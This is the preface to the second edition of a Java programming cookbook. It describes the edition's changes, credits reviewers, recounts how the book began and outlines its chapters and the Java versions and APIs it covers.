Important: Please read the Qt Code of Conduct - QtCreator project with folder named new I noticed a strange behaviour with qmake, using Qtcreator. I have a project with many files allocated in different folders. One of these folders is named "new". The strange thing is, every time I edit some file located in this folder, the whole project is recompiled, instead of recompiling only the edited file (.cpp file). Changing other files on other folders, the behaviour is correct. Renaming the new folder, solve the problem. A non-Qt project does't have this issue. Actually I am using Qt5.7.1 with MinGW 5.3.0 on windows7. It is very easy to reproduce. Create a new Qt project. Add a new file and put it in a folder named new. After compiling the whole project, try to change the new added file. is it a known problem? Thank you for any hint - mrjj Lifetime Qt Champion last edited by mrjj Hi It's not something I have seen reported before. Also, i tried to reproduce in a new project using your step by step but it only compiles test.cpp in the new folder. Could you perhaps post your .pro file? Thanks for the replay. This is my .pro file without any change, copied and pasted. #------------------------------------------------- # # Project created by QtCreator 2019-03-19T15:43:18 # #------------------------------------------------- QT += core gui greaterThan(QT_MAJOR_VERSION, 4): QT += widgets TARGET = prova_new \ new/dummy.cpp HEADERS += \ mainwindow.h \ new/dummy.h FORMS += \ mainwindow.ui # Default rules for deployment. qnx: target.path = /tmp/$${TARGET}/bin else: unix:!android: target.path = /opt/$${TARGET}/bin !isEmpty(target.path): INSTALLS += target - mrjj Lifetime Qt Champion last edited by Hi Super. Well, it looks exactly like my test one. What do you have in dummy.h / cpp ? Also are they include in mainwindow or main ? it could be a bug in Qt5.7.1 as im testing with Qt5.12 You must use such older version ? In dummy.h and dummy.cpp, (nothig special) #ifndef DUMMY_H #define DUMMY_H class Dummy { public: Dummy(); }; #endif // DUMMY_H #include "dummy.h" Dummy::Dummy() { } main.cpp #include "mainwindow.h" #include <QApplication> int main(int argc, char *argv[]) { QApplication a(argc, argv); MainWindow w; w.show(); return a.exec(); } My project is an application that we use at work and many users have Windows XP. Unfortunately, Qt5.12 is not compatible with Windows XP. - mrjj Lifetime Qt Champion last edited by Hi Ahh, the good old Windows XP. Not as stoned dead as they want to believe :) I would check to see if it has been reported. Your pro file look pretty normal. Its only when folder is named new ? If I rename new folder in new_old, for example, the problem disappears. I also tried, Qt5.8, already installed in my system, same problem. Maybe tomorow, I will try Qt5.12 and let you know.
https://forum.qt.io/topic/100890/qtcreator-project-with-folder-named-new
CC-MAIN-2020-34
refinedweb
479
71.31
I wanted to use NumPy [[1, 1], [1, 0]] n import numpy def fib(n): return (numpy.matrix("1 1; 1 0")**n).item(1) print fib(90) # Gives -1581614984 linalg.matrix_power list linalg.matrix_power -5.168070885485832e+19 -51680708854858323072L int() L The reason you see negative values appearing is because NumPy has defaulted to using the np.int32 dtype for your matrix. The maximum positive integer this dtype can represent is 231-1 which is 2147483647. Unfortunately, this is less the 47th Fibonacci number, 2971215073. The resulting overflow is causing the negative number to appear: >>> np.int32(2971215073) -1323752223 Using a bigger integer type (like np.int64) would fix this, but only temporarily: you'd still run into problems if you kept on asking for larger and larger Fibonacci numbers. The only sure fix is to use an unlimited-size integer type, such as Python's int type. To do this, modify your matrix to be of np.object type: def fib_2(n): return (np.matrix("1 1; 1 0", dtype=np.object)**n).item(1) The np.object type allows a matrix or array to hold any mix of native Python types. Essentially, instead of holding machine types, the matrix is now behaving like a Python list and simply consists of pointers to integer objects in memory. Python integers will be used in the calculation of the Fibonacci numbers now and overflow is not an issue. This flexibility comes at the cost of decreased performance: NumPy's speed originates from direct storage of machine integer/float types.
https://codedump.io/share/4ttP4IfIMsfD/1/numpy-matrix-exponentiation-gives-negative-value
CC-MAIN-2018-22
refinedweb
258
59.9
[hackers] [sbase] tail: Add rudimentary support to detect file truncation || sin This message : [ Message body ] [ More options ( top , bottom ) ] Related messages : [ Next message ] [ Previous message ] Contemporary messages sorted : [ by date ] [ by thread ] [ by subject ] [ by author ] [ by messages with attachments ] From : < git_AT_suckless.org > Date : Tue, 24 Mar 2015 23:53:39 +0100 (CET) commit a25a57f6ac74174bfbceeaf1255e64a028338474 Author: sin <sin_AT_2f30.org> Date: Mon Feb 9 14:41:49 2015 +0000 tail: Add rudimentary support to detect file truncation We cannot in general detect that truncation happened. At the moment we use a heuristic to compare the file size before and after a write happened. If the new file size is smaller than the old, we correctly handle truncation and dump the entire file to stdout. If it so happened that the new size is larger or equal to the old size after the file had been truncated without any reads in between, we will assume the data was appended to the file. There is no known way around this other than using inotify or kevent which is outside the scope of sbase. diff --git a/tail.c b/tail.c index 36fec77..11af1dd 100644 --- a/tail.c +++ b/tail.c _AT_@ -1,4 +1,6 @@ /* See LICENSE file for copyright and license details. */ +#include <sys/stat.h> + #include <limits.h> #include <stdint.h> #include <stdio.h> _AT_@ -59,6 +61,7 @@ usage(void) int main(int argc, char *argv[]) { + struct stat st1, st2; FILE *fp; size_t n = 10, tmpsize; int ret = 0, newline, many; _AT_@ -96,6 +99,8 @@ main(int argc, char *argv[]) if (many) printf("%s==> %s <==\n", newline ? "\n" : "", argv[0]); + if (stat(argv[0], &st1) < 0) + eprintf("stat %s:", argv[0]); newline = 1; tail(fp, argv[0], n); _AT_@ -108,8 +113,18 @@ main(int argc, char *argv[]) fflush(stdout); } if (ferror(fp)) - eprintf("readline '%s':", argv[0]); + eprintf("readline %s:", argv[0]); clearerr(fp); + /* ignore error in case file was removed, we continue + * tracking the existing open file descriptor */ + if (!stat(argv[0], &st2)) { + if (st2.st_size < st1.st_size) { + fprintf(stderr, "%s: file truncated\n", argv[0]); + rewind(fp); + } + st1 = st2; + } + sleep(1); } } fclose(fp); Received on Tue Mar 24 2015 - 23:53:39 CET This message : [ Message body ] Next message : git_AT_suckless.org: "[hackers] [sbase] Convert tail(1) to use size_t || FRIGN" Previous message : git_AT_suckless.org: "[hackers] [sbase] No need to free the buffer for every call to getline() || sin" Contemporary messages sorted : [ by date ] [ by thread ] [ by subject ] [ by author ] [ by messages with attachments ] This archive was generated by hypermail 2.3.0 : Wed Mar 25 2015 - 00:08:33 CET
http://lists.suckless.org/hackers/1503/6566.html
CC-MAIN-2022-05
refinedweb
435
70.53
. Theory: Out with the old, in with the new Hey EJB Advocate, It's time to wake up and smell the coffee! EJB 2.x is dead! Long live EJB 3! Just look how much simpler life will get when creating a persistent object like a customer from one of your previous articles: @Entity @Table(name="CUSTOMER") public class Customer implements Serializable { private int id; private String name; private Order openOrder; public Customer () { super(); } @Id @Column(name="CUST_ID") public int getId() { return id; } public void setId(int id) { this.id = id; } @Column(name="NAME") public String getName() { return name; } public void setName(String name) { this.name = name; } @OneToOne(cascade=CascadeType.ALL , fetch=FetchType.EAGER ) @JoinColumn(name="OPEN_ORDER_ID",referencedColumnName="ORDER_ID") public Order getOpenOrder() { return openOrder; } public void setOpenOrder(Order openOrder) { this.openOrder = openOrder; } } I only need to create a simple POJO and annotate it. I don't have to inherit from anything. No separate home, interface, or deployment descriptor is required. And I don't have to perform a vendor-specific mapping step! The code in a client program using EJB 3 is even simpler. Let's say I want to get the open order associated with the customer whose key is an integer called customerId: @PersistenceContext (unitName="db2") EntityManager em; try { Customer c = (Customer)em.find( Customer.class, new Integer(customerId) ); Order o = c.getOpenOrder(); return o; } catch (EntityNotFoundException e) { throw new CustomerDoesNotExist(customerId); } Because the one EntityManager instance serves as the "home" to all entities, there is no JNDI lookup required. It doesn't get any simpler than that. So tell me. Why go back to hamburger after eating steak? Signed, Never Going Back Practice: Not so fast, there are tradeoffs to consider Dear Never Going Back, Because your note was a bit cheeky, I will (with tongue in cheek) take the opportunity to point out that the entity EJB component you are talking about is actually part of the Java Persistence API (JPA) which is a separate but related specification spun off of JSR 220. So, it is more correct to say something like "using JPA is simpler". But seriously, I am glad you found a standard approach to persistence that you can live with. Too many folks I talk to end up inventing their own approach to persistence. I suppose that the "back" in your signing "Never Going Back" implies that you weren't one of these folks. That said (and at the risk of making you unhappy again), the EJB Advocate is going to very carefully parse the advantages you point out so that you can truly weigh the benefits of JPA versus CMP entity components: JPA entity components are not POJOs. You first mentioned that you simply create a POJO and annotate it (with @entity among other things) to create a JPA style entity. That is true. But strictly speaking, most do not consider a persistence mechanism to be based on POJOs unless it can be used with an existing -- unmodified -- simple Java class. You might also want to think back to the EJB 1.x days when entity components were more like POJOs. The instance variables were declared as part of the bean implementation, which was a concrete class. You "annotated" the class by declaring it an entity EJB and implemented the lifecycle methods like ejbLoad() and ejb Store() (or left them up to the deployment tools). One reason that this approach was abandoned is because it made loading the CMP fields an all or nothing affair. The EJB 2.x approach enables the flexibility to do performance enhancing tricks like map the get<Property>() methods onto a database cursor or stream implementation, reducing the number of transformations. JPA allows for "lazily" loading the properties through annotation, but as we will see in a later point, this approach creates its own problems when coupled with thinking that the entity is a POJO. Neither JPA nor EJB 2.x requires that you subclass (extend) any particular class. You then mentioned that you need not "inherit" from anything when using JPA, implying that EJB 2.x entities do. This implication is not true. Consider a typical EJB 2.x entity component class declaration: public abstract class CustomerBean implements EntityBean ... A class (whether abstract or concrete) that implements an interface does not really inherit anything from the interface it implements. Implementing an interface is simply a marker that the class can play a given role in the application -- exactly like the @entity annotation is intended to do. This distinction is important because Java only supports single inheritance with respect to implementation. You may only extend a single class and inherit its method implementations. You can implement as many interfaces as you want. And because an EJB 2.x entity is an abstract class, you need not implement any of the various EJB lifecycle methods associated with the EntityBean interface like ejbLoad() and ejbStore(). These implementations can be deferred to the deployment tool provided by the vendor. JPA entity components do not support multiple views. Next, you pointed out that you need not create an interface or home with a JPA entity. True. But this simplicity comes with a tradeoff: you directly access the implementation class. The limitation is that you only get a single view of the component. Java interfaces are powerful in that you can provide views of an implementation component that are customized to the needs of a client. EJB 2.x entity components maintain the concept of separating the implementation from the interfaces it supports. For example, you can provide both a remote and a local view of an entity. Why would you want to provide a remote interface to an entity EJB component when a well known best practice is to use a facade? In a previous EJB Advocate article, we discussed how to exploit custom home methods on entity components to serve as a built in facade. Since a facade is often used remotely, a remote home interface could be provided that includes one or more custom methods like so: public interface CustomerHome implements EJBHome { CustomerData ejbHomeGetOpenOrderForCustomer(int customerId) ... } Notice how this remote interface does not have any create() or find() methods. This deliberate omission ensures that an instance of the Customer entity can never be accessed remotely. The local interface and home to the same bean implementation would expose the create and find methods along with the appropriate get and set methods (that possibly represent CMRs as described in yet another EJB Advocate article). And, that said, most vendors of EJB-related tooling, like IBM Rational Application Developer for WebSphere software, generate the homes and interfaces in one step with a Wizard tool. Some even make it possible to start with the bean implementation, like a POJO, and promote methods to the interface and home as desired. JPA entity components mix implementation details into your POJOs. Another "advantage" you called out about JPA has to do with the ability to skip creating a separate deployment descriptor and skip a vendor-specific mapping step. That is all well and good -- especially the part about standard mappings to relational data stores -- but there is a tradeoff. You imbed the implementation details in the code, which makes the object even less like the simple POJO that you seemed to crave. One of the best features of EJB 2.x entity components is that the deployer could modify the details of how a given business object was made persistent completely independently of the bean provider. There is no reason that vendors cannot adopt a similar standard set of mapping annotations as part of an EJB 2.x style deployment descriptor to simplify the mapping step. JPA entity components are still best used behind a facade. Finally, you rightly pointed out that there is only one EntityManager implementation, which eliminates the need to do a JNDI lookup, and makes using a JPA entity component extremely easy. However, you failed to note that if you don't use the JPA entity within a transactional context, you need to do an explicit save to the EntityManager to persist any changes. Another aspect of JPA you failed to mention is that if an entity is declared to be "lazily" loaded in the annotations and is subsequently detached from the context (that is, the transaction ends), then the fields untouched are undefined. Having to explicitly manage the transactional context would add complexity to the JPA programming model. So it is still a best practice to use a session facade (whether a new EJB 3 style or an old EJB 2.x style). If you choose to return the POJO from the facade, you will either need to set the loading to "eager" or to touch all the fields in the JPA entity. With EJB 2.x custom home methods, a session is not absolutely required. As you can see, most of the benefits of EJB 3 and JPA that you mention involve simplifying assumptions that may not work for all situations. You have to decide for yourself whether you can live with those assumptions. In cases where you can, I hope you see that almost all of them can be applied to the EJB 2.x specification through deployment tooling. Finally, even the JPA specification mentions that EJB 2.x is still expected to be used after EJB 3 and JPA are finalized. Therefore (with apologies to Mark Twain), the EJB Advocate believes that the rumors of the demise of EJB 2.x have been greatly exaggerated. OK then, Your EJB Advocate Conclusion This exchange explored some fundamental questions about simplicity. For example, is it better to have a complex system that enables all the flexibility you need? Or is it better to have a simple system that makes it easy to handle the average case? In the musings above, the EJB Advocate wondered: why not provide for both by enabling flexibility but having a default case that makes things simple? For those that prefer an object oriented approach to application development, EJB 2.x may still be the better approach, since it exploits all the features of Java that make it such a powerful language, especially the separation of interface from implementation. Resources - - The EJB Advocate: Making entity EJB components perform, Part 2 by Geoffrey Hambrick.
http://www.ibm.com/developerworks/websphere/techjournal/0602_ejba/0602_ejba.html
CC-MAIN-2013-48
refinedweb
1,717
54.12
gocept.jsform 0.8 Next generation forms in javascript The gocept.jsform distribution JavaScript library for simple creation of forms in your clients browser. It just needs a JSON datastructure and creates a form with auto saving fields from it. Uses knockout for data-binding, json-template for templating and jquery for DOM manipulation and ajax calls. Requirements If you have a server using fanstatic to include resources, just do: from gocept.jsform.resource import jsform jsform.need() This will require all needed resources like jquery, knockout, json-template, widgets and the code to setup and run gocept.jsform itself. Without fanstatic, you should include the following resources by hand: - helpers.js - widgets.js - jsform.js You can find them in the resources directory in this package. Usage All you need to start creating forms is: <div id="replace_this_with_my_form"></div> <script type="text/javascript"> var my_form = new gocept.jsform.Form('replace_this_with_my_form'); my_form.load('/form_data.json'); </script> This will inject the form in the container with the id replace_this_with_my_form, load the form data via ajax from the url form_data.json and create input fields according to the content of form_data.json. form.load() accepts javascript objects as data or a url (like in the example above). It then guesses, which field widget to load by means of the datatype of your field: my_form.load( {firstName: '', // will result in a input field with type="text" title: [{id: 'mr', value: 'Mister'}, {id: 'mrs', value: 'Miss', selected: true}], // will result in a select box needs_glasses: false}); // will result in a checkbox gocept.jsform comes with basic templates for these three use cases. Of cource you can provide your own templates for either the form or the fields itself. Please refer to the customization section for further information. Tests The tests are written in jasmine and run using selenium webdriver. Customization There are various options which can be passed to customize the HTML output and the behaviour of gocept.jsform. Providing a save url for the server The great thing about gocept.jsform is, that it automatically pushes changes in your form fields to the server. For that to work you need to specify a url where gocept.jsform should propagate changes to: var form = new gocept.jsform.Form('my_form', {save_url: '/save.json'}); On every change, the following information is pushed to that url: - id: the name of the field (e.g. firstname) - value: the new value for that field (e.g. Bob) The server should now validate the given data. If saving went fine, it must return {status: 'success'}, if there was a (validation-) error, it must return e.g. {status: 'error', msg: 'Not a valid email address'}. The error will then be displayed next to the widget. Customizing the form template The default behaviour is to simply append every new field in the form tag. If you would like to customize the order of your fields or just need another boilerplate for you form, you can use a custom form template with containers for all or just some of the fields: var template = new jsontemplate.Template( ['<form method="POST" action="{action}" id="{form_id}">', '<table><tr><td class="firstname"><span id="firstname" /></td>', '<td class="lastname"><span id="lastname" /></td></tr></table>', '</form>'].join(''), {default_formatter: 'html'}); var form = new gocept.jsform.Form('my_form', {form_template: template}); form.load({firstname: 'Max', lastname: 'Mustermann'}); This will replace the span containers with id firstname and lastname with the appropriate input fields. Customizing field widgets You can either customize widgets by their type (e.g. all fields rendered for strings) or customize single widgets by their name. Customization by field type You can overwrite the default templates by providing your own templates in the options dict passed during form initialization: var form = new gocept.jsform.Form( 'my_form', {string_template: my_input_template, object_template: my_select_template, boolean_template: my_checkbox_template}); For every string data, your input template would be rendered instead of the default input text field. Same for lists and boolean values. Customization by field name Imagine you want checkboxes instead of a select field: var template = new jsontemplate.Template( ['<div class="title">Titel:', '{.repeated section value}', ' <div>', ' <input type="radio" name="{name}" value="{id}" class="{id}"', ' data- {value}', ' </div>', '{.end}', '</div>'].join(''), {default_formatter: 'html'}); var form = new gocept.jsform.Form('my_form'); form.load({title: [{id: 'mr', value: 'Mr.'}, {id: 'mrs', value: 'Mrs.'}]}, {title: {template: template}}); You can pass the load method a JS object containing customizations for each field. One of these customization options is template, which results in rendering two checkboxes instead of the default select box in the above example. You can also specify a label or other options for the fields: var template = new jsontemplate.Template( ['{label}: <input type="text" name="{name}" value="{default}"', ' data-bind="value: {name}" {readonly} />'].join(''), {default_formatter: 'html', undefined_str: ''}); var form = new gocept.jsform.Form('my_form'); form.load({firstname: 'Sebastian'}, {firstname: {template: template, label: 'First name', default: 'Max'}}); Developing gocept.jsform Change log for gocept.jsform 0.8 (2013-12-10) - Fixed: jsform did not render in IE8 if form template started with line break. 0.7 (2013-12-03) - Add ability to send a CSRF token with every request. This token must be available via the id csrf_token (can be customized) in the DOM. - Added minified versions of javascript resources. 0.6 (2013-09-06) - Bugfix: Use indexOf instead of startsWith, which is not available on all browsers. 0.5 (2013-09-06) - Declare for attribute on form labels. - Store "save on change" subscriptions so they can be cancelled. - Ignore null values for data fields. (#1) 0.4 (2013-08-27) - Made it possible to define templates as template files on file system. 0.3 (2013-08-27) - Add events after-load and after-save. - Fix JSON serialization to be able to handle Knockout observables. - Added reload functionality to the form class. 0.2 (2013-08-26) - Made it possible to preselect values in arrays when the form is rendered. - Changed form submit behaviour: - Default submit type is not POST instead of GET. (Change it with the save_type option) - Data is now submitted as JSON type. 0.1 (2013-08-17) initial release - Downloads (All Versions): - 51 downloads in the last day - 240 downloads in the last week - 728 downloads in the last month - Author: Sebastian Wehrmann <sw@gocept.com>, Maik Derstappen <md@derico.de> - Keywords: form javascript jquery client - License: ZPL 2.1 - Categories - Package Index Owner: sweh - DOAP record: gocept.jsform-0.8.xml
https://pypi.python.org/pypi/gocept.jsform/0.8
CC-MAIN-2014-10
refinedweb
1,070
58.48
enclose font in website Discussion in 'HTML' started by hoit, Feb enclose text with P-tagAndreas N, May 18, 2004, in forum: Perl - Replies: - 1 - Views: - 586 - Jürgen Exner - May 18, 2004 [Namespace] Could I enclose different namespaces ?Cram TeXeD, Apr 6, 2004, in forum: XML - Replies: - 0 - Views: - 435 - Cram TeXeD - Apr 6, 2004 #define macro to enclose an older macro with stringsDead RAM, Jul 13, 2004, in forum: C++ - Replies: - 20 - Views: - 1,409 - John Harrison - Jul 14, 2004 Regexp to enclose text with P-tagSubZane, May 18, 2004, in forum: Python - Replies: - 1 - Views: - 347 - Heiko Wundram - May 18, 2004 Swing Font, it's Java Font? ot native? how install new font?mttc, Jul 3, 2009, in forum: Java - Replies: - 2 - Views: - 2,631 - Roedy Green - Jul 3, 2009
http://www.thecodingforums.com/threads/enclose-font-in-website.672206/
CC-MAIN-2015-48
refinedweb
132
64.88
03 December 2008 18:11 [Source: ICIS news] PARIS (ICIS news)--Changes to the EU’s Emissions Trading Scheme (EU ETS) will not force chemical companies to relocate, according to a new study. For most chemical companies, the impact of having to buy carbon emission rights after 2013 will be small, according to the study by Climate Strategies, a European network of climate policy experts. The European Commission and Parliament have proposed a gradual phase-out of free allowances by 2020, with final a decision in 2011 on which substances are at risk of “carbon leakage” – the relocation of production facilities, jobs and emissions to outside the EU. Many chemical companies have claimed that unless they continue to receive CO2 allowances for free, they will be forced to relocate. This has led many EU member states to call for free allowances for all energy and carbon-intensive industries until 2020 if their cost increase exceeds a threshold level. But the study suggests that only a small number of chemicals are likely to be affected by carbon leakage, and that they will need some form of support to compete on price with rival products that are not subject to the EU ETS. In addition, the study said that the Commission’s proposed 2011 decision on which products are most at risk from carbon leakage must be carried out properly, with product-specific analyses. The report’s co-author, Dr. Karsten Neuhoff, from the ?xml:namespace> “Protecting all the most polluting activities from the real cost of carbon is not the way to get industry to invest in the creative solutions to climate change,”
http://www.icis.com/Articles/2008/12/03/9176677/eu-ets-changes-will-not-force-leakage-study.html
CC-MAIN-2014-52
refinedweb
272
53.34
JDK 1.5, code-named Tiger, is an exciting change to the Java landscape. It introduces several major new facilities, such as generic types for better data structuring, metadata for annotating Java© classes in a flexible but well-defined manner, new pattern-based mechanisms for reading data, and a new mechanism for formatted printing. In addition, a much larger number of smaller but important changes add up to a new release that is a must for Java developers. It will be quite some time before these mechanisms are fully understood and in wide circulation, but you will want to know about them right away. I wrote in the Afterword to the first edition that “writing this book has been a humbling experience.” I should add that maintaining it has been humbling, too. While many reviewers and writers have been lavish with their praise—one very kind reviewer called it “arguably the best book ever written on the Java programming language”—I have been humbled by the number of errors and omissions in the first edition. In preparing this edition, I have endeavored to correct these. At the same time I have added a number of new recipes and removed a smaller number of old ones. The largest single addition is Chapter 8, which covers generic types and enumerations, features that provide increased flexibility for containers such as Java Collections. Now that Java includes a regular expressions API, Chapter 4 has been converted from the Apache Regular Expressions API to JDK 1.4 Regular Expressions. I have somewhat hesitantly removed the chapter on Network Web, including the JabaDot Web Portal Site program. This was the longest single program example in the book, and it was showing signs of needing considerable refactoring (in fact, it needed a complete rewrite). In writing such a web site today, one would make much greater use of JSP tags, and almost certainly use a web site framework such as Struts (), SOFIA (), or the Spring Framework () to eliminate a lot of the tedious coding. Or, you might use an existing package such as the Java Lobby’s JLCP. Material on Servlets and JavaServer pages can be found in O’Reilly’s Java Servlet & JSP Cookbook by Bruce W. Perry. Information on Struts itself can be found in Chuck Cavaness’s Programming Jakarta Struts (O’Reilly). Information on SOAP-based web services is included in O’Reilly’s Java Web Services by Dave Chappell and Tyler Jewell, so this topic is not covered here. While I’ve tested the examples on a variety of systems and provide Ant scripts to rebuild everything, I did most of the new development and writing for this edition using Mac OS X, which truly is “Unix for the masses,” and which provides one of the best-supported out-of-the-box Java experiences. Mac OS X Java does, however, suffer a little from “new version lag” and, since 1.5 was not available for the Mac by the time this edition went to press, the JDK 1.5 material was developed and tested on Linux and Windows. I wish to express my heartfelt thanks to all who sent in both comments and criticisms of the book after the first English edition was in print. Special mention must be made of one of the book’s German translators,[1] Gisbert Selke, who read the first edition cover to cover during its translation and clarified my English. Gisbert did it all over again for the second edition and provided many code refactorings, which have made this a far better book than it would be otherwise. Going beyond the call of duty, Gisbert even contributed one recipe (Recipe 26.4) and revised some of the other recipes in the same chapter. Thank you, Gisbert! The second edition also benefited from comments by Jim Burgess, who read large parts of the book. Comments on individual chapters were received from Jonathan Fuerth, Kim Fowler, Marc Loy, and Mike McCloskey. My wife Betty and teenaged children each proofread several chapters as well. The following people contributed significant bug reports or suggested improvements from the first edition: Rex Bosma, Rod Buchanan, John Chamberlain, Keith Goldman, Gilles-Philippe Gregoire, B. S. Hughes, Jeff Johnston, Rob Konigsberg, Tom Murtagh, Jonathan O’Connor, Mark Petrovic, Steve Reisman, Bruce X. Smith, and Patrick Wohlwend. My thanks to all of them, and my apologies to anybody I’ve missed. My thanks to the good guys behind the O’Reilly “bookquestions” list for fielding so many questions. Thanks to Mike Loukides, Deb Cameron, and Marlowe Shaeffer for editorial and production work on the second edition. If you know a little Java, great. If you know more Java, even better! This book is ideal for anyone who knows some Java and wants to learn more. If you don’t know any Java yet, you should start with one of the more introductory books from O’Reilly, such as Head First Java or Learning Java if you’re new to this family of languages, or Java in a Nutshell if you’re an experienced C programmer. I started programming in C in 1980 while working at the University of Toronto, and C served me quite well through the 1980s and into the 1990s. In 1995, as the nascent language Oak was being renamed Java, I had the good fortune to be told about it by my colleague J. Greg Davidson. I sent an email to the address Greg provided, and got this mail back from James Gosling, Java’s inventor, in March 1995: > Hi. A friend told me about WebRunner(?), your extensible network > browser. It and Oak(?) its extension language, sounded neat. Can > you please tell me if it's available for play yet, and/or if any > papers on it are available for FTP? Check out (oak got renamed to java and webrunner got renamed to hotjava to keep the lawyers happy) I downloaded HotJava and began to play with it. At first I wasn’t sure about this newfangled language, which looked like a mangled C/C++. I wrote test and demo programs, sticking them a few at a time into a directory that I called javasrc to keep it separate from my C source (because often the programs would have the same name). And as I learned more about Java, I began to see its advantages for many kinds of work, such as the automatic memory reclaim and the elimination of pointer calculations. The javasrc directory kept growing. I wrote a Java course for Learning Tree,[2] and the directory grew faster, reaching the point where it needed subdirectories. Even then, it became increasingly difficult to find things, and it soon became evident that some kind of documentation was needed. In a sense, this book is the result of a high-speed collision between my javasrc directory and a documentation framework established for another newcomer language. In O’Reilly’s Perl Cookbook, Tom Christiansen and Nathan Torkington worked out a very successful design, presenting the material in small, focused articles called “recipes.” The original model for such a book is, of course, the familiar kitchen cookbook. Using the term “cookbook” to refer to an enumeration of how-to recipes relating to computers has a long history. On the software side, Donald Knuth applied the “cookbook” analogy to his book The Art of Computer Programming (Addison Wesley), first published in 1968. On the hardware side, Don Lancaster wrote The TTL Cookbook (Sams, 1974). (Transistor-transistor logic, or TTL, was the small-scale building block of electronic circuits at the time.) Tom and Nathan worked out a successful variation on this, and I recommend their book for anyone who wishes to, as they put it, “learn more Perl.” Indeed, the work you are now reading strives to be the book for the person who wishes to “learn more Java.” The code in each recipe is intended to be largely self-contained; feel free to borrow bits and pieces of any of it for use in your own projects. The code is distributed with a Berkeley-style copyright, just to discourage wholesale reproduction. I’m going to assume that you know the basics of Java. I won’t tell you how to println a string and a number at the same time, or how to write a class that extends Applet and prints your name in the window. I’ll presume you’ve taken a Java course or studied an introductory book such as O’Reilly’s Head First Java, Learning Java, or Java in a Nutshell. However, Chapter 1 covers some techniques that you might not know very well and that are necessary to understand some of the later material. Feel free to skip around! Both the printed version of the book and the electronic copy are heavily cross-referenced. Unlike 17) reads the top-level directory of the place where I keep all my Java example source code and builds a browser-friendly index.html file for that directory. For another example, the body of the first edition was partly composed in XML, a simplification that builds upon many years, although it seems that the blurring of distinctions is more likely. However, I used XML here to type in and mark up the original text of some of the chapters of this book. The text was then converted to the publishing software format. JDK 1.4 was the first release to include this powerful technology; I also mention several third-party. A new chapter was added in this section of the second edition. JDK 1.5 introduced a new dimension to the notion of data structuring, by adapting the C++ notion of templates to the Java Collections; the result known as Generics is the main subject of Chapter 8. Despite some syntactic resemblance to procedural languages such as C, Java is at heart an object-oriented programming language. Chapter 9, discusses some of the key notions of OOP as it applies to Java, including the commonly overridden methods of java.lang.Object and the important issue of Design Patterns. The next few chapters deal with aspects of traditional input and output. Chapter 10, details the rules for reading and writing files. (Don’t skip this if you think files are boring, as you’ll need some of this information in later chapters: you’ll read and write on serial or parallel ports in Chapter 12 and on a socket-based network connection in Chapter 16!) Chapter 11, shows you everything else about files—such as finding their size and last-modified time—and about reading and modifying directories, creating temporary files, and renaming files on disk. Chapter 12, shows how you can use the javax.comm API to read/write on serial and parallel ports using a standard Java API. Chapter 13, leads us into the GUI development side of things. This chapter is a mix of the lower-level details, such as drawing graphics and setting fonts and colors, and very high-level activities, such as controlling a video clip or movie. In Chapter 14, I cover the higher-level aspects of a GUI, such as buttons, labels, menus, and the like—the GUI’s predefined components. Once you have a GUI (really, before you actually write it), you’ll want to read Chapter 15, so your programs can work as well in Akbar, Afghanistan, Algiers, Amsterdam, or Angleterre as they do in Alberta, Arkansas, or Alabama . . . . Since Java was originally promulgated as “the programming language for the Internet,” it’s only fair that we spend some of our time on networking in Java. Chapter 16, covers the basics of network programming from the client side, focusing on sockets. We’ll then move to the server side in Chapter 17. In Chapter 18, you’ll learn more client-side techniques. Programs on the Net often need to generate electronic mail, so this section ends with Chapter 19. Chapter 20, covers the essentials of the Java Database Connectivity (JDBC) and Java Data Objects (JDO) packages, Method secrets as how to write API cross-reference documents mechanically (“become a famous Java book author in your spare time!”)++ or other languages. There isn’t room in an 800-page book for everything I’d like to tell you about Java. The Chapter 27 presents some closing thoughts and a link to my online summary of Java APIs that every Java developer should know about. No two programmers or writers will agree on the best order for presenting all the Java topics. To help you find your way around, I’ve included extensive cross-references, mostly by recipe number. Java has gone through five major versions. The first official release was JDK 1.0, and its last bug-fixed version was 1.0.2. The second major release is Java JDK 1.1, and the latest bug-fixed version is 1.1.9, though it may be up from that by the time you read this book. The third major release, in December 1998, was to be known as JDK 1.2, but somebody at Sun abruptly renamed JDK 1.2 at the time of its release to Java 2, and the implementation is known as Java 2 SDK 1.2. The current version as of the writing of the first edition of this book was Java 2 SDK 1.3 (JDK 1.3), which was released in 2000. As the first edition of this book went to press, Java 2 Version 1.4 was about to appear; it entered beta (which Sun calls “early access”) around the time of the book’s completion so I could mention it only briefly. The second edition of this book looks to have better timing; Java 2 Version 1.5 is in beta as I am updating the book. This book is aimed at the fifth version, Java 2 Standard Edition, Version 1.5. By the time of publication, I expect that all Java projects in development will be using JDK 1.4, with a very few wedded to earlier versions for historical reasons. I have used several platforms to test this code for portability. I’ve tested with Sun’s Linux JDK. For the mass market, I’ve tested many of the programs on Sun’s Win32 (Windows 2000/XP/2003) implementation. And, “for the rest of us,” I’ve done most of my recent development using Apple’s Mac OS X Version 10.2.x and later. However, since Java is portable, I anticipate that the vast majority of the examples will work on any Java-enabled platform, except where extra APIs are required. Not every example has been tested on every platform, but all have been tested on at least one—and most on more than one. The Java API consists of two parts: core APIs and noncore APIs. The core is, by definition, what’s included in the JDK that you download for free from. Noncore is everything else. But even this “core” is far from tiny: it weighs in at around 50 packages and well over 2,000 public classes, averaging around 12 public methods each. Programs that stick to this core API are reasonably assured of portability to any Java platform. The noncore APIs are further divided into standard extensions and nonstandard extensions. All standard extensions have package names beginning with javax.[3] (and reference implementations are available from Sun). A Java licensee (such as Apple or IBM) is not required to implement every standard extension, but if it does, the interface of the standard extension should be adhered to. This book calls your attention to any code that depends on a standard extension. Little code here depends on nonstandard extensions, other than code listed in the book itself. My own package, com.darwinsys, contains some utility classes used here and there; you will see an import for this at the top of any file that uses classes from it. In addition, two other platforms, the J2ME and the J2EE, are standardized. Java 2 Micro Edition is concerned with small devices such as handhelds (PalmOS and others), cell phones, fax machines, and the like. Within J2ME are various “profiles” for different classes of devices. At the high end, the Java 2 Enterprise Edition (J2EE) is concerned with building large, scalable, distributed applications. Servlets, JavaServer Pages, JavaServer Faces, CORBA, RMI, JavaMail, Enterprise JavaBeans© (EJBs), Transactions, and other APIs are part of the J2EE. J2ME and J2EE packages normally begin with “javax” as they are not core J2SE packages. This book does not cover J2ME at all but includes a few of the J2EE APIs that are also useful on the client side, such as RMI and JavaMail. As mentioned earlier, coverage of Servlets and JSPs from the first edition of this book has been removed as there is now a S ervlet and JSP Cookbook. A lot of useful information is publishes, in my opinion, the best selection of Java books on the market. As the API continues to expand, so does the coverage. You can find the latest versions and ordering information on O’Reilly’s Java books. 